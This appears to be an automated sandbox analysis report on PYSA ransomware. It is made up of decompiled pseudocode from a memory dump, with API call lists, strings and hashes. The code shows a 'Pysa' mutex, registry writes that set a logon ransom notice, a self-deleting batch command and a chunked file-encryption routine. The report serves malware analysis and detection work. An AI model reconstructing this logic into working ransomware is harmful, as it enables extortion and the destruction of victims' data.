                    				E013D6D90(_t119, _t244,  *((intOrPtr*)(_t230 - 0x2c)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t230 - 0x18)))) + 0x10))(), 0);
                    				_t226 =  *(_t230 - 0x34);
                    				_t183 =  >=  ? _t230 - 0x38 : _t230 - 0x3c;
                    				 *((char*)(_t230 - 4)) = 0xf;
                    				_push(_t226);
                    				_t206 =  *( >=  ? _t230 - 0x38 : _t230 - 0x3c);
                    				memset(_t226, 0, _t206 << 2);
                    				if(_t206 == 0) {
                    					L013CDA60();
                    				} else {
                    					E013CD9E0();
                    				}
                    				_t227 =  *(_t230 - 0x4c);
                    				_t187 =  >=  ? _t230 - 0x50 : _t230 - 0x54;
                    				 *((char*)(_t230 - 4)) = 0x10;
                    				_push(_t227);
                    				_t208 =  *( >=  ? _t230 - 0x50 : _t230 - 0x54);
                    				memset(_t227, 0, _t208 << 2);
                    				if(_t208 == 0) {
                    					L013CDA60();
                    				} else {
                    					E013CD9E0();
                    				}
                    				 *((intOrPtr*)(_t230 - 4)) = 0x11;
                    				_t191 =  <=  ? _t230 + 0xf0 : _t230 + 0xec;
                    				_t192 =  *( <=  ? _t230 + 0xf0 : _t230 + 0xec);
                    				memset( *(_t230 - 0x10), 0,  *( <=  ? _t230 + 0xf0 : _t230 + 0xec) << 0);
                    				_t134 = L013CDA60( *(_t230 - 0x10));
                    				 *[fs:0x0] =  *((intOrPtr*)(_t230 - 0xc));
                    				return E013F268B(_t134,  *(_t230 + 0xf8) ^ _t230);
                    			}



































                    0x013e3221
                    0x013e322e
                    0x013e3230
                    0x013e323b
                    0x013e323c
                    0x013e323f
                    0x013e3244
                    0x013e3246
                    0x013e324e
                    0x013e324f
                    0x013e3253
                    0x013e3259
                    0x013e325b
                    0x013e3264
                    0x013e326a
                    0x013e3273
                    0x013e327c
                    0x013e3285
                    0x013e328a
                    0x013e328d
                    0x013e3290
                    0x013e3294
                    0x013e329c
                    0x013e329f
                    0x013e32a2
                    0x013e32b0
                    0x013e32b1
                    0x013e32c0
                    0x013e32c8
                    0x013e32cd
                    0x013e32d7
                    0x013e32db
                    0x013e32ec
                    0x013e32ec
                    0x013e3307
                    0x013e3311
                    0x013e331a
                    0x013e3324
                    0x013e3327
                    0x013e332d
                    0x013e3332
                    0x013e333e
                    0x013e3343
                    0x013e334d
                    0x013e3352
                    0x013e3360
                    0x013e3365
                    0x013e336f
                    0x013e3374
                    0x013e3385
                    0x013e338a
                    0x013e338f
                    0x013e3393
                    0x013e3396
                    0x013e339a
                    0x013e33a8
                    0x013e33a8
                    0x013e33ad
                    0x013e33b5
                    0x013e33bf
                    0x013e33c2
                    0x013e33c5
                    0x013e33cb
                    0x013e33cd
                    0x013e33d0
                    0x013e33d5
                    0x013e33d5
                    0x013e33d8
                    0x013e33db
                    0x013e33e7
                    0x013e33ee
                    0x013e340f
                    0x013e3418
                    0x013e343b
                    0x013e3440
                    0x013e344c
                    0x013e345b
                    0x013e346c
                    0x013e3471
                    0x013e3474
                    0x013e347a
                    0x013e347b
                    0x013e347f
                    0x013e3483
                    0x013e348c
                    0x013e3485
                    0x013e3485
                    0x013e3485
                    0x013e34a0
                    0x013e34a5
                    0x013e34a8
                    0x013e34ae
                    0x013e34af
                    0x013e34b3
                    0x013e34b7
                    0x013e34c0
                    0x013e34b9
                    0x013e34b9
                    0x013e34b9
                    0x013e34d4
                    0x013e34e3
                    0x013e34e9
                    0x013e34eb
                    0x013e34ed
                    0x013e34f8
                    0x013e3517

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013E32EC
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013E33A8
                    Strings
                    • : this key is too short to encrypt any messages, xrefs: 013E32B4
                    • for this public key, xrefs: 013E3379
                    • exceeds the maximum of , xrefs: 013E3357
                    • : message length of , xrefs: 013E3335
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaise
                    • String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
                    • API String ID: 3476068407-412673420
                    • Opcode ID: 01e552f13144a887e425fde9d643cea0f3696ef6503d4489367dce9956894b8c
                    • Instruction ID: 7dbbdfbcf0c72c25e37459fc5b4379c556a2731abdb4d1661b47806598f3f833
                    • Opcode Fuzzy Hash: 01e552f13144a887e425fde9d643cea0f3696ef6503d4489367dce9956894b8c
                    • Instruction Fuzzy Hash: 5FA1527590024ADFDF21DFA8C844FEEBBB9BF58314F148159E809A7251DB719A04CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E013C67F8(void* __ecx, signed int __edx) {
                    				intOrPtr _v8;
                    				char _v16;
                    				char _v24;
                    				signed int _v28;
                    				signed int _v40;
                    				char _v56;
                    				char _v72;
                    				short _v4172;
                    				intOrPtr _v4176;
                    				signed int _v4180;
                    				char _v4196;
                    				intOrPtr _v4200;
                    				signed int _v4204;
                    				char _v4220;
                    				intOrPtr _v4224;
                    				char _v4244;
                    				intOrPtr _v4248;
                    				char _v4268;
                    				intOrPtr _v4360;
                    				char _v4444;
                    				signed int _v4452;
                    				char _v4460;
                    				char _v4808;
                    				char _v4812;
                    				char _v4813;
                    				signed int _v4820;
                    				signed int _v4824;
                    				signed int _v4828;
                    				signed int _v4832;
                    				signed int _v4836;
                    				intOrPtr _v4840;
                    				intOrPtr _v4844;
                    				signed int _v4848;
                    				signed int _v4852;
                    				intOrPtr _v4856;
                    				long long _v4860;
                    				signed int _v4864;
                    				signed int _v4868;
                    				signed int _v4872;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t148;
                    				signed int _t149;
                    				intOrPtr _t151;
                    				void* _t184;
                    				signed int _t189;
                    				signed int _t208;
                    				intOrPtr _t220;
                    				signed int _t229;
                    				void* _t244;
                    				signed int _t260;
                    				signed int _t264;
                    				signed int _t272;
                    				signed int _t273;
                    				intOrPtr _t275;
                    				signed int _t278;
                    				intOrPtr _t281;
                    				signed int _t285;
                    				signed int _t286;
                    				void* _t287;
                    				intOrPtr _t288;
                    				signed int _t290;
                    				signed int _t294;
                    				signed int _t296;
                    				signed int _t298;
                    				void* _t301;
                    				void* _t302;
                    				void* _t304;
                    				long long* _t305;
                    				intOrPtr _t307;
                    				signed int _t312;
                    				intOrPtr _t314;
                    				void* _t322;
                    
                    				_t272 = __edx;
                    				_t229 = _t296;
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t298 = (_t296 & 0xfffffff8) + 4;
                    				_v8 =  *((intOrPtr*)(_t229 + 4));
                    				_t294 = _t298;
                    				_push(0xffffffff);
                    				_push(E01415DA7);
                    				_push( *[fs:0x0]);
                    				_push(__ecx);
                    				_push(_t229);
                    				_push(__ecx);
                    				E013F2860();
                    				_t148 =  *0x1435234; // 0x78d9f939
                    				_t149 = _t148 ^ _t294;
                    				_v40 = _t149;
                    				_push(_t149);
                    				 *[fs:0x0] =  &_v24;
                    				_v28 = _t298;
                    				_t151 =  *((intOrPtr*)(_t229 + 0x10));
                    				_t275 =  *((intOrPtr*)(_t229 + 0xc));
                    				_t281 =  *((intOrPtr*)(_t229 + 8));
                    				_v4844 = _t275;
                    				_v4840 = _t151;
                    				_t307 = _t151;
                    				if(_t307 >= 0 && (_t307 > 0 || _t275 > 0x400)) {
                    					E013F5890(_t275,  &_v4172, 0, 0x1000);
                    					wsprintfW( &_v4172, L"%s%s", _t281,  *0x1435000);
                    					_t151 = E013FEB5D(_t281,  &_v4172); // executed
                    					_t301 = _t298 + 0x24;
                    					_t309 = _t151;
                    					if(_t151 == 0) {
                    						E013CBEF0(0x1438790,  &_v72, 0x10);
                    						E013CBEF0(0x1438790,  &_v56, 0x10);
                    						_v4204 = _v4204 & 0x00000000;
                    						_v4200 = 0xf;
                    						_v4220 = 0;
                    						E013C64B7( &_v4220, _t309,  &_v72, 0x10);
                    						_v16 = 0;
                    						_t165 =  >=  ? _v4220 :  &_v4220;
                    						_t302 = _t301 - 0x18;
                    						E013C2AD0(_t302,  >=  ? _v4220 :  &_v4220);
                    						E013C7B97(_t275);
                    						_v4180 = _v4180 & 0;
                    						_v16 = 1;
                    						_v4176 = 0xf;
                    						_v4196 = 0;
                    						E013C64B7( &_v4196, _v4200 - 0x10,  &_v56, 0x10);
                    						_v16 = 2;
                    						_t172 =  >=  ? _v4196 :  &_v4196;
                    						_t304 = _t302 + 0x1c - 0x18;
                    						E013C2AD0(_t304,  >=  ? _v4196 :  &_v4196);
                    						E013C7B97(_t275);
                    						_v16 = 3;
                    						E013F5890(_t275,  &_v4812, 0, 0x160);
                    						_t305 = _t304 + 0x28;
                    						E013C2572( &_v4812);
                    						_v16 = 4;
                    						E013CCBB0( &_v4812, _v4176 - 0x10,  &_v72, 0x10,  &_v56,  *((intOrPtr*)(_v4812 + 0x20))( &_v4244,  &_v4268));
                    						_t184 = E013F2770(_t275,  *((intOrPtr*)(_t229 + 0x10)), 0x64, 0);
                    						_t312 = _t272;
                    						if(_t312 < 0) {
                    							L8:
                    							_t244 = E013F2770(_t184, _t272, 0x400, 0);
                    							E013F2CA0(_t185, _t244);
                    							asm("movsd [ebp-0x12f0], xmm0");
                    							_push(_t244);
                    							_push(_t244);
                    							 *_t305 = _v4860;
                    							E013FEB90();
                    							_t285 = E013F28D0();
                    							_t189 = _t272;
                    							__eflags = _t285 | _t189;
                    							if((_t285 | _t189) == 0) {
                    								_t285 = 1;
                    								_t189 = 0;
                    								__eflags = 0;
                    							}
                    							_t286 = _t285 << 0xa;
                    							__eflags = _t286;
                    							_v4836 = (_t189 << 0x00000020 | _t285) << 0xa;
                    							_v4828 = _t286;
                    						} else {
                    							_t286 = 0x5f5e000;
                    							_v4828 = 0x5f5e000;
                    							if(_t312 > 0 || _t184 > 0x5f5e000) {
                    								_v4836 = _v4836 & 0x00000000;
                    							} else {
                    								goto L8;
                    							}
                    						}
                    						_t314 =  *((intOrPtr*)(_t229 + 0x10));
                    						if(_t314 > 0) {
                    							L15:
                    							_v4848 = 0xa;
                    						} else {
                    							if(_t314 < 0) {
                    								L14:
                    								_v4848 = 1;
                    							} else {
                    								_t315 = _t275 - 0x989680;
                    								if(_t275 >= 0x989680) {
                    									goto L15;
                    								} else {
                    									goto L14;
                    								}
                    							}
                    						}
                    						_v4813 = 0;
                    						asm("stosd");
                    						asm("stosd");
                    						asm("stosd");
                    						_v4872 = _v4872 & 0x00000000;
                    						_v4868 = _v4868 & 0x00000000;
                    						_v4864 = _v4864 & 0x00000000;
                    						E013C58F2( &_v4872, _t315, _t286,  &_v4813); // executed
                    						_v4820 = _t286;
                    						_t287 = 0;
                    						_v16 = 5;
                    						_v4832 = _v4836;
                    						E013C82C3( &_v4872, 0);
                    						E013F5890( &_v4872,  &_v4460, 0, 0xc0);
                    						_push(1);
                    						E013C28D3( &_v4460);
                    						_v16 = 6;
                    						E013C71BF( &_v4460, _t272, _t315,  &_v4172, 0x23, 0x40); // executed
                    						if(_v4360 != 0) {
                    							_t278 = _v4828;
                    							_t260 = 0;
                    							_v4824 = _v4824 & 0;
                    							_t208 = 0;
                    							_t288 =  *((intOrPtr*)(_t229 + 0xc));
                    							_v16 = 7;
                    							while(1) {
                    								_v4852 = _t260;
                    								if(_t208 >= 0x64) {
                    									break;
                    								}
                    								if(_t260 >= 0 && _t260 < 0x64) {
                    									asm("cdq");
                    									_t273 = _t260 % _v4848;
                    									if(_t273 == 0) {
                    										_t322 = _v4840 - _v4836;
                    										if(_t322 >= 0) {
                    											if(_t322 > 0) {
                    												L25:
                    												asm("cdq");
                    												_t220 = E013F2820(_t260, _t273, _v4820, _v4832);
                    												_t264 = _t273;
                    												_v4856 = _t220;
                    												_v4828 = _t264;
                    												_push(0);
                    												_push(_t264);
                    												_push(_t220);
                    												E013C7E38( &_v4460); // executed
                    												_push(0);
                    												_t290 = _v4872;
                    												_push(_v4868 - _v4872);
                    												_push(_t290);
                    												E013C74F4( &_v4460); // executed
                    												_v4832 = _v4832 & 0x00000000;
                    												_push(0);
                    												_push(_v4828);
                    												_v4820 = _v4452;
                    												_push(_v4856);
                    												E013C8014( &_v4444, _t323); // executed
                    												_push(_v4820);
                    												_push(_t290);
                    												_push(_t290);
                    												E013EA5D0( &_v4808);
                    												_push(_v4832);
                    												_push(_v4820);
                    												_push(_t290); // executed
                    												E013C853F( &_v4444, _t323); // executed
                    												_v4844 = _v4844 - _v4820;
                    												asm("sbb [ebp-0x12dc], eax");
                    												_t260 = _v4852;
                    												_t288 = _v4844;
                    											} else {
                    												_t323 = _t288 - _t278;
                    												if(_t288 > _t278) {
                    													goto L25;
                    												}
                    											}
                    										}
                    									}
                    									_t208 = _v4824;
                    								}
                    								_t260 = _t260 + 1;
                    								_t208 = _t208 + 1;
                    								_v4824 = _t208;
                    							}
                    							_push(2);
                    							_push(0);
                    							_push(0);
                    							E013C8014( &_v4444, __eflags); // executed
                    							__eflags = _v4248 - 0x10;
                    							_t211 =  >=  ? _v4268 :  &_v4268;
                    							_t287 = 0;
                    							_push(0);
                    							_push(0x400);
                    							_push( >=  ? _v4268 :  &_v4268);
                    							E013C853F( &_v4444, _v4248 - 0x10);
                    							__eflags = _v4224 - 0x10;
                    							_push(0);
                    							_t214 =  >=  ? _v4244 :  &_v4244;
                    							_push(0x400);
                    							_push( >=  ? _v4244 :  &_v4244);
                    							E013C853F( &_v4444, __eflags);
                    							_v16 = 6;
                    						}
                    						E013C65F9( &_v4460, __eflags);
                    						E013C4020( &_v4460);
                    						E013C6197( &_v4872);
                    						E013C38DE( &_v4812, _t287, __eflags);
                    						E013C6118( &_v4244, 1, _t287);
                    						E013C6118( &_v4196, 1, _t287);
                    						E013C6118( &_v4268, 1, _t287);
                    						_t151 = E013C6118( &_v4220, 1, _t287);
                    					}
                    				}
                    				 *[fs:0x0] = _v24;
                    				__eflags = _v40 ^ _t294;
                    				return E013F268B(_t151, _v40 ^ _t294);
                    			}













































































                    0x013c67f8
                    0x013c67f9
                    0x013c67fb
                    0x013c67fc
                    0x013c6800
                    0x013c6807
                    0x013c680b
                    0x013c680d
                    0x013c680f
                    0x013c681a
                    0x013c681b
                    0x013c681c
                    0x013c681d
                    0x013c6823
                    0x013c6828
                    0x013c682d
                    0x013c682f
                    0x013c6834
                    0x013c6838
                    0x013c683e
                    0x013c6841
                    0x013c6844
                    0x013c6847
                    0x013c684a
                    0x013c6850
                    0x013c6856
                    0x013c6858
                    0x013c687a
                    0x013c6892
                    0x013c68a0
                    0x013c68a5
                    0x013c68a8
                    0x013c68aa
                    0x013c68bd
                    0x013c68ca
                    0x013c68cf
                    0x013c68e2
                    0x013c68ec
                    0x013c68f3
                    0x013c6907
                    0x013c690a
                    0x013c6911
                    0x013c6917
                    0x013c6923
                    0x013c692b
                    0x013c693d
                    0x013c6941
                    0x013c694b
                    0x013c6952
                    0x013c6964
                    0x013c6968
                    0x013c696f
                    0x013c6975
                    0x013c6981
                    0x013c6991
                    0x013c6997
                    0x013c699c
                    0x013c69a5
                    0x013c69b6
                    0x013c69ce
                    0x013c69da
                    0x013c69df
                    0x013c69e1
                    0x013c69fd
                    0x013c6a0b
                    0x013c6a0d
                    0x013c6a12
                    0x013c6a20
                    0x013c6a21
                    0x013c6a22
                    0x013c6a25
                    0x013c6a31
                    0x013c6a33
                    0x013c6a37
                    0x013c6a39
                    0x013c6a3d
                    0x013c6a3e
                    0x013c6a3e
                    0x013c6a3e
                    0x013c6a44
                    0x013c6a44
                    0x013c6a47
                    0x013c6a4d
                    0x013c69e3
                    0x013c69e3
                    0x013c69e8
                    0x013c69ee
                    0x013c69f4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013c69ee
                    0x013c6a53
                    0x013c6a57
                    0x013c6a6f
                    0x013c6a6f
                    0x013c6a59
                    0x013c6a59
                    0x013c6a63
                    0x013c6a63
                    0x013c6a5b
                    0x013c6a5b
                    0x013c6a61
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013c6a61
                    0x013c6a59
                    0x013c6a7b
                    0x013c6a88
                    0x013c6a8f
                    0x013c6a90
                    0x013c6a97
                    0x013c6a9e
                    0x013c6aa5
                    0x013c6aae
                    0x013c6ab9
                    0x013c6abf
                    0x013c6ac2
                    0x013c6ac6
                    0x013c6acc
                    0x013c6ade
                    0x013c6aec
                    0x013c6aee
                    0x013c6afd
                    0x013c6b08
                    0x013c6b13
                    0x013c6b19
                    0x013c6b1f
                    0x013c6b21
                    0x013c6b27
                    0x013c6b29
                    0x013c6b2c
                    0x013c6b30
                    0x013c6b30
                    0x013c6b39
                    0x00000000
                    0x00000000
                    0x013c6b41
                    0x013c6b52
                    0x013c6b53
                    0x013c6b5b
                    0x013c6b67
                    0x013c6b6d
                    0x013c6b73
                    0x013c6b7d
                    0x013c6b8b
                    0x013c6b8e
                    0x013c6b93
                    0x013c6b95
                    0x013c6b9d
                    0x013c6ba3
                    0x013c6ba4
                    0x013c6ba5
                    0x013c6bac
                    0x013c6bbd
                    0x013c6bbe
                    0x013c6bc4
                    0x013c6bc5
                    0x013c6bcc
                    0x013c6bdd
                    0x013c6be4
                    0x013c6be6
                    0x013c6bec
                    0x013c6bf2
                    0x013c6bf8
                    0x013c6bfd
                    0x013c6c09
                    0x013c6c0a
                    0x013c6c0b
                    0x013c6c10
                    0x013c6c1c
                    0x013c6c22
                    0x013c6c23
                    0x013c6c2e
                    0x013c6c3a
                    0x013c6c40
                    0x013c6c46
                    0x013c6b75
                    0x013c6b75
                    0x013c6b77
                    0x00000000
                    0x00000000
                    0x013c6b77
                    0x013c6b73
                    0x013c6b6d
                    0x013c6c4c
                    0x013c6c4c
                    0x013c6c52
                    0x013c6c53
                    0x013c6c54
                    0x013c6c54
                    0x013c6c5f
                    0x013c6c61
                    0x013c6c63
                    0x013c6c6b
                    0x013c6c70
                    0x013c6c88
                    0x013c6c8f
                    0x013c6c91
                    0x013c6c92
                    0x013c6c93
                    0x013c6c94
                    0x013c6c99
                    0x013c6ca6
                    0x013c6ca7
                    0x013c6cb4
                    0x013c6cb5
                    0x013c6cb6
                    0x013c6cea
                    0x013c6cea
                    0x013c6cf7
                    0x013c6d02
                    0x013c6d0d
                    0x013c6d18
                    0x013c6d26
                    0x013c6d34
                    0x013c6d42
                    0x013c6d50
                    0x013c6d50
                    0x013c68aa
                    0x013c6d58
                    0x013c6d65
                    0x013c6d72

                    APIs
                    • wsprintfW.USER32(?,%s%s,?,?,00000000,00001000,78D9F939,00000000,00000000,00000043,?,00000043,00000043,01415DA7,000000FF), ref: 013C6892
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013C69DA
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013C6A06
                    • __floor_pentium4.LIBCMT ref: 013C6A25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__floor_pentium4wsprintf
                    • String ID: %s%s
                    • API String ID: 4014860136-3252725368
                    • Opcode ID: ff4b51e25ae622940c2db198ca5e9832094604cb0e513bacedd73b6f56c89fe5
                    • Instruction ID: e0635a9a3f75d099d1ad7b1b1846eaa3d500a2897850af17f9e5bf3a61623765
                    • Opcode Fuzzy Hash: ff4b51e25ae622940c2db198ca5e9832094604cb0e513bacedd73b6f56c89fe5
                    • Instruction Fuzzy Hash: 43E16BB1D002699BDB24DB59CC45BEEB7B8EF14744F0041EDE609E6290DB706E94CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E013CA0EF(void* __ecx) {
                    				void* _t2;
                    				void* _t4;
                    				void* _t10;
                    				void* _t12;
                    				CHAR* _t14;
                    
                    				_t10 = __ecx;
                    				FreeConsole(); // executed
                    				_t14 = "Pysa";
                    				_t2 = OpenMutexA(0x1f0001, 0, _t14);
                    				_t16 = _t2;
                    				if(_t2 == 0) {
                    					_t4 = CreateMutexA(0, 0, _t14); // executed
                    					_push(0);
                    					E013CA164(_t10, _t16); // executed
                    					E013CA164(_t10, _t16); // executed
                    					_t12 = 1;
                    					E013CA06D(_t12);
                    					ReleaseMutex(_t4);
                    					E013C9E22();
                    				}
                    				return 0;
                    			}








                    0x013ca0ef
                    0x013ca0f1
                    0x013ca0f7
                    0x013ca105
                    0x013ca10b
                    0x013ca10d
                    0x013ca112
                    0x013ca118
                    0x013ca11b
                    0x013ca122
                    0x013ca128
                    0x013ca129
                    0x013ca12f
                    0x013ca135
                    0x013ca135
                    0x013ca13e

                    APIs
                    • FreeConsole.KERNEL32 ref: 013CA0F1
                    • OpenMutexA.KERNEL32(001F0001,00000000,Pysa), ref: 013CA105
                    • CreateMutexA.KERNEL32(00000000,00000000,Pysa), ref: 013CA112
                      • Part of subcall function 013CA164: __EH_prolog3_GS.LIBCMT ref: 013CA16B
                      • Part of subcall function 013CA164: GetProcessHeap.KERNEL32(00000008,0000001C), ref: 013CA20C
                      • Part of subcall function 013CA164: HeapAlloc.KERNEL32(00000000), ref: 013CA213
                      • Part of subcall function 013CA164: CreateThread.KERNEL32(00000000,00000000,Function_0000A13F,00000000,00000000,?), ref: 013CA252
                      • Part of subcall function 013CA164: WaitForMultipleObjects.KERNEL32(?,00000000,00000001,000000FF), ref: 013CA293
                      • Part of subcall function 013CA164: CloseHandle.KERNEL32(00000000), ref: 013CA2AC
                      • Part of subcall function 013CA164: GetProcessHeap.KERNEL32(00000000,00000000), ref: 013CA2BB
                      • Part of subcall function 013CA164: HeapFree.KERNEL32(00000000), ref: 013CA2C2
                      • Part of subcall function 013CA06D: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000002,?), ref: 013CA08F
                      • Part of subcall function 013CA06D: RegSetValueExA.ADVAPI32(?,legalnoticetext,00000000,00000007,0141BC40,0141BC42), ref: 013CA0C0
                      • Part of subcall function 013CA06D: RegSetValueExA.ADVAPI32(?,legalnoticecaption,00000000,00000007,PYSA,00000005), ref: 013CA0D5
                      • Part of subcall function 013CA06D: RegCloseKey.ADVAPI32(?), ref: 013CA0DA
                    • ReleaseMutex.KERNEL32(00000000), ref: 013CA12F
                      • Part of subcall function 013C9E22: GetTempPathA.KERNEL32(00000104,?), ref: 013C9E45
                      • Part of subcall function 013C9E22: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013C9E6F
                      • Part of subcall function 013C9E22: _strrchr.LIBCMT ref: 013C9E93
                      • Part of subcall function 013C9E22: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 013C9EB6
                      • Part of subcall function 013C9E22: wsprintfA.USER32(?,:Repeatdel "%s"if exist "%s" goto Repeatrmdir "%s"del "%s",?,?,?,?), ref: 013C9F27
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Heap$CreateMutex$CloseFileFreeOpenProcessValue$AllocConsoleH_prolog3_HandleModuleMultipleNameObjectsPathReleaseTempThreadWait_strrchrwsprintf
                    • String ID: Pysa
                    • API String ID: 941924302-2412705946
                    • Opcode ID: 6552f6dc4095f111c9b69ee487294a7b3b5091ee27b6fe44680afe10af583ba2
                    • Instruction ID: ee8cd6afff71107ae527a31b3831ef244469ffd1ad854f0b5e4a9f86069584b1
                    • Opcode Fuzzy Hash: 6552f6dc4095f111c9b69ee487294a7b3b5091ee27b6fe44680afe10af583ba2
                    • Instruction Fuzzy Hash: 80E01A725022A56AD3313B7A7E0CEAB3E78EFE2EF9711001EF409D7155EA694841C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0140D3DE() {
                    				int _v8;
                    				void* __ecx;
                    				void* _t6;
                    				int _t7;
                    				char* _t8;
                    				char* _t13;
                    				int _t17;
                    				void* _t19;
                    				char* _t25;
                    				WCHAR* _t27;
                    
                    				_t27 = GetEnvironmentStringsW();
                    				if(_t27 == 0) {
                    					L7:
                    					_t13 = 0;
                    				} else {
                    					_t6 = E0140D3A7(_t27);
                    					_pop(_t19);
                    					_t17 = _t6 - _t27 >> 1;
                    					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                    					_v8 = _t7;
                    					if(_t7 == 0) {
                    						goto L7;
                    					} else {
                    						_t8 = E0140131B(_t19, _t7); // executed
                    						_t25 = _t8;
                    						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                    							_t13 = 0;
                    						} else {
                    							_t13 = _t25;
                    							_t25 = 0;
                    						}
                    						E014012E1(_t25);
                    					}
                    				}
                    				if(_t27 != 0) {
                    					FreeEnvironmentStringsW(_t27);
                    				}
                    				return _t13;
                    			}













                    0x0140d3ed
                    0x0140d3f3
                    0x0140d44b
                    0x0140d44b
                    0x0140d3f5
                    0x0140d3f6
                    0x0140d3fb
                    0x0140d404
                    0x0140d40a
                    0x0140d410
                    0x0140d415
                    0x00000000
                    0x0140d417
                    0x0140d418
                    0x0140d41d
                    0x0140d422
                    0x0140d440
                    0x0140d43a
                    0x0140d43a
                    0x0140d43c
                    0x0140d43c
                    0x0140d443
                    0x0140d448
                    0x0140d415
                    0x0140d44f
                    0x0140d452
                    0x0140d452
                    0x0140d460

                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 0140D3E7
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0140D40A
                      • Part of subcall function 0140131B: HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0140D430
                    • _free.LIBCMT ref: 0140D443
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0140D452
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                    • String ID:
                    • API String ID: 2278895681-0
                    • Opcode ID: 4088baf5ac76437ca3dde85ec30ebe43012974cf114be805a6d935a0d858edbd
                    • Instruction ID: 407e0818829a5b18c44355ce02c15ccd3ea345f5282c9692a302e0ed2ada7269
                    • Opcode Fuzzy Hash: 4088baf5ac76437ca3dde85ec30ebe43012974cf114be805a6d935a0d858edbd
                    • Instruction Fuzzy Hash: 3301B562A022557B232259FB5C88CBB6E6DDAC2AA4315013EFA04C3294DA709C0581B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E013C7210(signed int __ebx, intOrPtr __ecx) {
                    				signed int _t61;
                    				void* _t76;
